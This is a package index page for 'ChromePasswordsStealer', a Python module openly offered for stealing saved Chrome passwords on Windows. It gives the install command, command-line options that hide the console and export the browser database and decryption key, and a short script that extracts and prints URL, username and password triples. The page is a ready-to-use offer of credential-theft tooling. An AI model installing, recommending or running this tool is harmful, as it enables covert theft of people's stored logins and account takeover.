Skip to main content

This module steals chrome passwords on Windows.

Project description

ChromePasswordsStealer logo

ChromePasswordsStealer

Description

This module steals chrome passwords on Windows.

Requirements

This package require:

  • python3
  • python3 Standard Library
  • pywin32
  • PythonToolsKit
  • PyCryptodome

Installation

pip install ChromePasswordsStealer

Usages

Command lines

# Python executable
python3 ChromePasswordsStealer.pyz -h
# or
chmod u+x ChromePasswordsStealer.pyz
./ChromePasswordsStealer.pyz --help

# Python module
python3 -m ChromePasswordsStealer

# Entry point (console)
ChromeStealer --save-all --window -f passwords

Python script

from ChromePasswordsStealer import ChromePasswordsStealer
stealer = ChromePasswordsStealer()
stealer = ChromePasswordsStealer("passwords", True)
stealer.get_database_cursor()
stealer.get_key()
for url, username, password in stealer.get_credentials():
    print(url, username, password)

stealer.save_and_clean()

Help

~# python3 ChromePasswordsStealer.py -h

usage: ChromePasswordsStealer.py [-h] [--filename FILENAME] [--window] [--save-all]

This program steals Chrome passwords on Windows.

optional arguments:
  -h, --help            show this help message and exit
  --filename FILENAME, -f FILENAME
                        The filename to export the credentials.
  --window, -w          Do not hide the console.
  --save-all, -s        Save chrome db, key file and key.

Links

Licence

Licensed under the GPL, version 3.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

ChromePasswordsStealer-1.0.0.tar.gz (19.9 kB view details)

Uploaded Source

File details

Details for the file ChromePasswordsStealer-1.0.0.tar.gz.

File metadata

  • Download URL: ChromePasswordsStealer-1.0.0.tar.gz
  • Upload date:
  • Size: 19.9 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.2.0 pkginfo/1.6.1 requests/2.25.0 setuptools/59.6.0 requests-toolbelt/0.9.1 tqdm/4.54.1 CPython/3.9.10

File hashes

Hashes for ChromePasswordsStealer-1.0.0.tar.gz
Algorithm Hash digest
SHA256 1c80f3e45a33cb0943b51274ec46f83441fc6069ffc1f7cae19f19d7c544bbe3
MD5 db5a2054e6dd28d12263e639f0d76509
BLAKE2b-256 42f222a31c9e03b8ed9f422b54affa7b702ad34942ed06490fb14ca005968eca

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page